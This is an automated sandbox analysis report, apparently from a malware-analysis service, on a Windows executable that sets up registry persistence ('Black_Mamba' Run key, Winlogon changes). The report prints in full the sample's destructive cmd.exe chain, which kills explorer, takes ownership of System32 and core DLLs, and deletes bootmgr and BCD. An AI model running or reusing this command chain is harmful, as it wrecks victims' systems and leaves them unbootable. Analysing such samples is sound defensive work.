Analysis
-
max time kernel
132s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
27-03-2022 03:14
Static task
static1
Behavioral task
behavioral1
Sample
62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
Resource
win10v2004-en-20220113
General
-
Target
62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
-
Size
167KB
-
MD5
e2dd51185d89bf02160ca232d2c9be77
-
SHA1
d562fc86c73c154030b7f7021ecc10c89312cc22
-
SHA256
62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d
-
SHA512
6d2e3cfdecbd7cbce5258b312405ad53f6e0e4a0b2a2f1e98795063cf0718203494125d663e411742c0033a6e1cb580843a1ff1475e25ea82bd09a2a70deb340
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe -
Disables RegEdit via registry modification
-
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 376 icacls.exe 3916 takeown.exe 720 icacls.exe 2540 takeown.exe 4632 icacls.exe 3804 takeown.exe 1672 icacls.exe 460 takeown.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 3916 takeown.exe 720 icacls.exe 2540 takeown.exe 4632 icacls.exe 3804 takeown.exe 1672 icacls.exe 460 takeown.exe 376 icacls.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black_Mamba = "C:\\Users\\Admin\\AppData\\Local\\Temp\\62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe" 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe -
Modifies WinLogon 2 TTPs 1 IoCs
Processes:
62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3304 taskkill.exe 4844 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exetaskkill.exetakeown.exetakeown.exetakeown.exetakeown.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1228 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe Token: SeDebugPrivilege 1228 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe Token: SeDebugPrivilege 3304 taskkill.exe Token: SeTakeOwnershipPrivilege 460 takeown.exe Token: SeTakeOwnershipPrivilege 3916 takeown.exe Token: SeTakeOwnershipPrivilege 2540 takeown.exe Token: SeTakeOwnershipPrivilege 3804 takeown.exe Token: SeDebugPrivilege 4844 taskkill.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.execmd.exedescription pid process target process PID 1228 wrote to memory of 2520 1228 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe cmd.exe PID 1228 wrote to memory of 2520 1228 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe cmd.exe PID 2520 wrote to memory of 3304 2520 cmd.exe taskkill.exe PID 2520 wrote to memory of 3304 2520 cmd.exe taskkill.exe PID 2520 wrote to memory of 460 2520 cmd.exe takeown.exe PID 2520 wrote to memory of 460 2520 cmd.exe takeown.exe PID 2520 wrote to memory of 376 2520 cmd.exe icacls.exe PID 2520 wrote to memory of 376 2520 cmd.exe icacls.exe PID 2520 wrote to memory of 3916 2520 cmd.exe takeown.exe PID 2520 wrote to memory of 3916 2520 cmd.exe takeown.exe PID 2520 wrote to memory of 720 2520 cmd.exe icacls.exe PID 2520 wrote to memory of 720 2520 cmd.exe icacls.exe PID 2520 wrote to memory of 2540 2520 cmd.exe takeown.exe PID 2520 wrote to memory of 2540 2520 cmd.exe takeown.exe PID 2520 wrote to memory of 4632 2520 cmd.exe icacls.exe PID 2520 wrote to memory of 4632 2520 cmd.exe icacls.exe PID 2520 wrote to memory of 3804 2520 cmd.exe takeown.exe PID 2520 wrote to memory of 3804 2520 cmd.exe takeown.exe PID 2520 wrote to memory of 1672 2520 cmd.exe icacls.exe PID 2520 wrote to memory of 1672 2520 cmd.exe icacls.exe PID 2520 wrote to memory of 4844 2520 cmd.exe taskkill.exe PID 2520 wrote to memory of 4844 2520 cmd.exe taskkill.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "1" 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUA = "1" 62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe"C:\Users\Admin\AppData\Local\Temp\62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe"1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Adds Run key to start application
- Modifies WinLogon
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k color 47 && taskkill /f /im explorer.exe && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant %username%:F && takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant %username%:F && taskkill /f /im taskhost.exe && takeown /f C:\Windows\System32\user32.dll && icacls C:\Windows\System32\user32.dll /grant %username%:F && takeown /f C:\Windows\System32\kernel32.dll && icacls C:\Windows\System32\kernel32.dll /grant %username%:F && takeown /f C:\Windows\explorer.exe && icacls C:\Windows\explorer.exe /grant %username%:F && takeown /f C:\Windows\Boot\PCAT\bootmgr && icacls C:\Windows\Boot\PCAT\bootmgr /grant %username%:F && del C:\Windows\Boot\PCAT\bootmgr && takeown /f C:\Windows\Boot\DVD\PCAT\BCD && icacls C:\Windows\Boot\DVD\PCAT\BCD /grant %username%:F && del C:\Windows\Boot\DVD\PCAT\BCD && takeown /f C:\Windows\explorer.exe && icacls C:\Windows\explorer.exe /grant %username%:F && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && Exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.exe /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winlogon.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winlogon.exe /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskhost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/376-137-0x0000000000000000-mapping.dmp
-
memory/460-136-0x0000000000000000-mapping.dmp
-
memory/720-139-0x0000000000000000-mapping.dmp
-
memory/1228-133-0x000000001BA22000-0x000000001BA24000-memory.dmpFilesize
8KB
-
memory/1228-132-0x000000001BA20000-0x000000001BA22000-memory.dmpFilesize
8KB
-
memory/1228-131-0x00007FFE82B80000-0x00007FFE83641000-memory.dmpFilesize
10.8MB
-
memory/1228-130-0x0000000000D10000-0x0000000000D40000-memory.dmpFilesize
192KB
-
memory/1672-143-0x0000000000000000-mapping.dmp
-
memory/2520-134-0x0000000000000000-mapping.dmp
-
memory/2540-140-0x0000000000000000-mapping.dmp
-
memory/3304-135-0x0000000000000000-mapping.dmp
-
memory/3804-142-0x0000000000000000-mapping.dmp
-
memory/3916-138-0x0000000000000000-mapping.dmp
-
memory/4632-141-0x0000000000000000-mapping.dmp
-
memory/4844-144-0x0000000000000000-mapping.dmp